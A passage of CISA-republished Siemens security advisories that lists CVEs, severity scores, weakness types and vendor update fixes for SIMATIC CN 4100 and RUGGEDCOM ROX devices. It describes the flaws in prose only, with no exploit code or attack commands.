unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-200 Exposure of Sensitive Information to an Unauthorized Actor Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CVE-2025-55752 Relative Path Traversal vulnerability in Apache Tomcat. The fix for bug 60013 introduced a regression where the rewritten URL was normalized before it was decoded. This introduced the possibility that, for rewrite rules that rewrite query parameters to the URL, an attacker could manipulate the request URI to bypass security constraints including the protection for /WEB-INF/ and /META-INF/. If PUT requests were also enabled then malicious files could be uploaded leading to remote code execution. PUT requests are normally limited to trusted users and it is considered unlikely that PUT requests would be enabled in conjunction with a rewrite that manipulated the URI. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.10, from 10.1.0-M1 through 10.1.44, from 9.0.0.M11 through 9.0.108. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.6 though 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.11 or later, 10.1.45 or later or 9.0.109 or later, which fix the issue. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-23 Relative Path Traversal Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-55754 Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in Apache Tomcat. Tomcat did not escape ANSI escape sequences in log messages. If Tomcat was running in a console on a Windows operating system, and the console supported ANSI escape sequences, it was possible for an attacker to use a specially crafted URL to inject ANSI escape sequences to manipulate the console and the clipboard and attempt to trick an administrator into running an attacker controlled command. While no attack vector was found, it may have been possible to mount this attack on other operating systems. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.10, from 10.1.0-M1 through 10.1.44, from 9.0.40 through 9.0.108. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.60 though 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.11 or later, 10.1.45 or later or 9.0.109 or later, which fix the issue. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-150 Improper Neutralization of Escape, Meta, or Control Sequences Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.6 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H CVE-2025-61748 Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 21.0.8 and 25; Oracle GraalVM for JDK: 21.0.8; Oracle GraalVM Enterprise Edition: 21.3.15. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-284 Improper Access Control Metrics CVSS Version Base Score Base Severity Vector String 3.1 3.7 LOW CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N CVE-2025-61795 Improper Resource Shutdown or Release vulnerability in Apache Tomcat. If an error occurred (including exceeding limits) during the processing of a multipart upload, temporary copies of the uploaded parts written to disc were not cleaned up immediately but left for the garbage collection process to delete. Depending on JVM settings, application memory usage and application load, it was possible that space for the temporary copies of uploaded parts would be filled faster than GC cleared it, leading to a DoS. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.11, from 10.1.0-M1 through 10.1.46, from 9.0.0.M1 through 9.0.109. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 though 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.12 or later, 10.1.47 or later or 9.0.110 or later which fixes the issue. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-404 Improper Resource Shutdown or Release Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2026-2673 Issue summary: An OpenSSL TLS 1.3 server may fail to negotiate the expected preferred key exchange group when its key exchange group configuration includes the default by using the 'DEFAULT' keyword. Impact summary: A less preferred key exchange may be used even when a more preferred group is supported by both client and server, if the group was not included among the client's initial predicated keyshares. This will sometimes be the case with the new hybrid post-quantum groups, if the client chooses to defer their use until specifically requested by the server. If an OpenSSL TLS 1.3 server's configuration uses the 'DEFAULT' keyword to interpolate the built-in default group list into its own configuration, perhaps adding or removing specific elements, then an implementation defect causes the 'DEFAULT' list to lose its 'tuple' structure, and all server-supported groups were treated as a single sufficiently secure 'tuple', with the server not sending a Hello Retry Request (HRR) even when a group in a more preferred tuple was mutually supported. As a result, the client and server might fail to negotiate a mutually supported post-quantum key agreement group, such as 'X25519MLKEM768', if the client's configuration results in only 'classical' groups (such as 'X25519' being the only ones in the client's initial keyshare prediction). OpenSSL 3.5 and later support a new syntax for selecting the most preferred TLS 1.3 key agreement group on TLS servers. The old syntax had a single 'flat' list of groups, and treated all the supported groups as sufficiently secure. If any of the keyshares predicted by the client were supported by the server the most preferred among these was selected, even if other groups supported by the client, but not included in the list of predicted keyshares would have been more preferred, if included. The new syntax partitions the groups into distinct 'tuples' of roughly equivalent security. Within each tuple the most preferred group included among the client's predicted keyshares is chosen, but if the client supports a group from a more preferred tuple, but did not predict any corresponding keyshares, the server will ask the client to retry the ClientHello (by issuing a Hello Retry Request or HRR) with the most preferred mutually supported group. The above works as expected when the server's configuration uses the built-in default group list, or explicitly defines its own list by directly defining the various desired groups and group 'tuples'. No OpenSSL FIPS modules are affected by this issue, the code in question lies outside the FIPS boundary. OpenSSL 3.6 and 3.5 are vulnerable to this issue. OpenSSL 3.6 users should upgrade to OpenSSL 3.6.2 once it is released. OpenSSL 3.5 users should upgrade to OpenSSL 3.5.6 once it is released. OpenSSL 3.4, 3.3, 3.0, 1.0.2 and 1.1.1 are not affected by this issue. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-757 Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade') Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CVE-2026-21925 Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: RMI). Supported versions that are affected are Oracle Java SE: 8u471, 8u471-b50, 8u471-perf, 11.0.29, 17.0.17, 21.0.9, 25.0.1; Oracle GraalVM for JDK: 17.0.17 and 21.0.9; Oracle GraalVM Enterprise Edition: 21.3.16. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N). View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 4.8 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N CVE-2026-21932 Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: AWT, JavaFX). Supported versions that are affected are Oracle Java SE: 8u471, 8u471-b50, 8u471-perf, 11.0.29, 17.0.17, 21.0.9, 25.0.1; Oracle GraalVM for JDK: 17.0.17 and 21.0.9; Oracle GraalVM Enterprise Edition: 21.3.16. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.4 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N). View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.4 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N CVE-2026-21933 Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Networking). Supported versions that are affected are Oracle Java SE: 8u471, 8u471-b50, 8u471-perf, 11.0.29, 17.0.17, 21.0.9, 25.0.1; Oracle GraalVM for JDK: 17.0.17 and 21.0.9; Oracle GraalVM Enterprise Edition: 21.3.16. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CVE-2026-21945 Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u471, 8u471-b50, 8u471-perf, 11.0.29, 17.0.17, 21.0.9, 25.0.1; Oracle GraalVM for JDK: 17.0.17 and 21.0.9; Oracle GraalVM Enterprise Edition: 21.3.16. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-400 Uncontrolled Resource Consumption Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2026-21947 Vulnerability in Oracle Java SE (component: JavaFX). Supported versions that are affected are Oracle Java SE: 8u471-b50. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N). View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Metrics CVSS Version Base Score Base Severity Vector String 3.1 3.1 LOW CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N CVE-2026-22924 The affected application does not properly restrict unauthenticated connections and is susceptible to resource exhaustion conditions. This could allow an attacker to disrupt normal operations or perform unauthorized actions, potentially impacting system availability and integrity. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-306 Missing Authentication for Critical Function Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H CVE-2026-22925 The affected application is susceptible to resource exhaustion when subjected to high volume of TCP SYN packets This could allow an attacker to render the service unavailable and cause denial-of-service conditions by overwhelming system resources. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-770 Allocation of Resources Without Limits or Throttling Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2026-28387 Issue summary: An uncommon configuration of clients performing DANE TLSA-based server authentication, when paired with uncommon server DANE TLSA records, may result in a use-after-free and/or double-free on the client side. Impact summary: A use after free can have a range of potential consequences such as the corruption of valid data, crashes or execution of arbitrary code. However, the issue only affects clients that make use of TLSA records with both the PKIX-TA(0/PKIX-EE(1) certificate usages and the DANE-TA(2) certificate usage. By far the most common deployment of DANE is in SMTP MTAs for which RFC7672 recommends that clients treat as 'unusable' any TLSA records that have the PKIX certificate usages. These SMTP (or other similar) clients are not vulnerable to this issue. Conversely, any clients that support only the PKIX usages, and ignore the DANE-TA(2) usage are also not vulnerable. The client would also need to be communicating with a server that publishes a TLSA RRset with both types of TLSA records. No FIPS modules are affected by this issue, the problem code is outside the FIPS module boundary. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-416 Use After Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H CVE-2026-28388 Issue summary: When a delta CRL that contains a Delta CRL Indicator extension is processed a NULL pointer dereference might happen if the required CRL Number extension is missing. Impact summary: A NULL pointer dereference can trigger a crash which leads to a Denial of Service for an application. When CRL processing and delta CRL processing is enabled during X.509 certificate verification, the delta CRL processing does not check whether the CRL Number extension is NULL before dereferencing it. When a malformed delta CRL file is being processed, this parameter can be NULL, causing a NULL pointer dereference. Exploiting this issue requires the X509_V_FLAG_USE_DELTAS flag to be enabled in the verification context, the certificate being verified to contain a freshestCRL extension or the base CRL to have the EXFLAG_FRESHEST flag set, and an attacker to provide a malformed CRL to an application that processes it. The vulnerability is limited to Denial of Service and cannot be escalated to achieve code execution or memory disclosure. For that reason the issue was assessed as Low severity according to our Security Policy. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2026-28389 Issue summary: During processing of a crafted CMS EnvelopedData message with KeyAgreeRecipientInfo a NULL pointer dereference can happen. Impact summary: Applications that process attacker-controlled CMS data may crash before authentication or cryptographic operations occur resulting in Denial of Service. When a CMS EnvelopedData message that uses KeyAgreeRecipientInfo is processed, the optional parameters field of KeyEncryptionAlgorithmIdentifier is examined without checking for its presence. This results in a NULL pointer dereference if the field is missing. Applications and services that call CMS_decrypt() on untrusted input (e.g., S/MIME processing or CMS-based protocols) are vulnerable. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2026-28390 Issue summary: During processing of a crafted CMS EnvelopedData message with KeyTransportRecipientInfo a NULL pointer dereference can happen. Impact summary: Applications that process attacker-controlled CMS data may crash before authentication or cryptographic operations occur resulting in Denial of Service. When a CMS EnvelopedData message that uses KeyTransportRecipientInfo with RSA-OAEP encryption is processed, the optional parameters field of RSA-OAEP SourceFunc algorithm identifier is examined without checking for its presence. This results in a NULL pointer dereference if the field is missing. Applications and services that call CMS_decrypt() on untrusted input (e.g., S/MIME processing or CMS-based protocols) are vulnerable. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2026-31789 Issue summary: Converting an excessively large OCTET STRING value to a hexadecimal string leads to a heap buffer overflow on 32 bit platforms. Impact summary: A heap buffer overflow may lead to a crash or possibly an attacker controlled code execution or other undefined behavior. If an attacker can supply a crafted X.509 certificate with an excessively large OCTET STRING value in extensions such as the Subject Key Identifier (SKID) or Authority Key Identifier (AKID) which are being converted to hex, the size of the buffer needed for the result is calculated as multiplication of the input length by 3. On 32 bit platforms, this multiplication may overflow resulting in the allocation of a smaller buffer and a heap buffer overflow. Applications and services that print or log contents of untrusted X.509 certificates are vulnerable to this issue. As the certificates would have to have sizes of over 1 Gigabyte, printing or logging such certificates is a fairly unlikely operation and only 32 bit platforms are affected, this issue was assigned Low severity. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H CVE-2026-31790 Issue summary: Applications using RSASVE key encapsulation to establish a secret encryption key can send contents of an uninitialized memory buffer to a malicious peer. Impact summary: The uninitialized buffer might contain sensitive data from the previous execution of the application process which leads to sensitive data leakage to an attacker. RSA_public_encrypt() returns the number of bytes written on success and -1 on error. The affected code tests only whether the return value is non-zero. As a result, if RSA encryption fails, encapsulation can still return success to the caller, set the output lengths, and leave the caller to use the contents of the ciphertext buffer as if a valid KEM ciphertext had been produced. If applications use EVP_PKEY_encapsulate() with RSA/RSASVE on an attacker-supplied invalid RSA public key without first validating that key, then this may cause stale or uninitialized contents of the caller-provided ciphertext buffer to be disclosed to the attacker in place of the KEM ciphertext. As a workaround calling EVP_PKEY_public_check() or EVP_PKEY_public_check_quick() before EVP_PKEY_encapsulate() will mitigate the issue. The FIPS modules in 3.6, 3.5, 3.4, 3.3, 3.1 and 3.0 are affected by this issue. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-754 Improper Check for Unusual or Exceptional Conditions Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N Acknowledgments Siemens ProductCERT reported these vulnerabilities to CISA. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-032379 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-05-12 Date Revision Summary 2026-05-12 1 Publication Date 2026-05-14 2 Initial CISA Republication of Siemens ProductCERT SSA-032379 advisory Legal Notice and Terms of Use

View CSAF Summary Ruggedcom Rox contains an input validation vulnerability in the Scheduler functionality that could allow an authenticated remote attacker to execute arbitrary commands with root privileges on the underlying operating system. Siemens has released new versions for the affected products and recommends to update to the latest versions. The following versions of Siemens Ruggedcom Rox are affected: RUGGEDCOM ROX MX5000 vers:intdot/<2.17.1  RUGGEDCOM ROX MX5000RE vers:intdot/<2.17.1  RUGGEDCOM ROX RX1400 vers:intdot/<2.17.1  RUGGEDCOM ROX RX1500 vers:intdot/<2.17.1 RUGGEDCOM ROX RX1501 vers:intdot/<2.17.1  RUGGEDCOM ROX RX1510 vers:intdot/<2.17.1  RUGGEDCOM ROX RX1511 vers:intdot/<2.17.1  RUGGEDCOM ROX RX1512 vers:intdot/<2.17.1  RUGGEDCOM ROX RX1524 vers:intdot/<2.17.1  RUGGEDCOM ROX RX1536 vers:intdot/<2.17.1  RUGGEDCOM ROX RX5000 vers:intdot/<2.17.1  CVSS Vendor Equipment Vulnerabilities v3 9.1 Siemens Siemens Ruggedcom Rox Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2025-40949 Affected devices do not properly sanitize user-supplied input in the Scheduler functionality of the Web UI, allowing commands to be injected into the task scheduling backend. This could allow an authenticated remote attacker to execute arbitrary commands with root privileges on the underlying operating system. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H Acknowledgments Emmanuel Zhou, Rick Wyble, Mehemt Balta, and Adam Robbie of Palo Alto Networks OT Threat Research Lab reported this vulnerability to Siemens. Siemens ProductCERT reported this vulnerability to CISA. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: 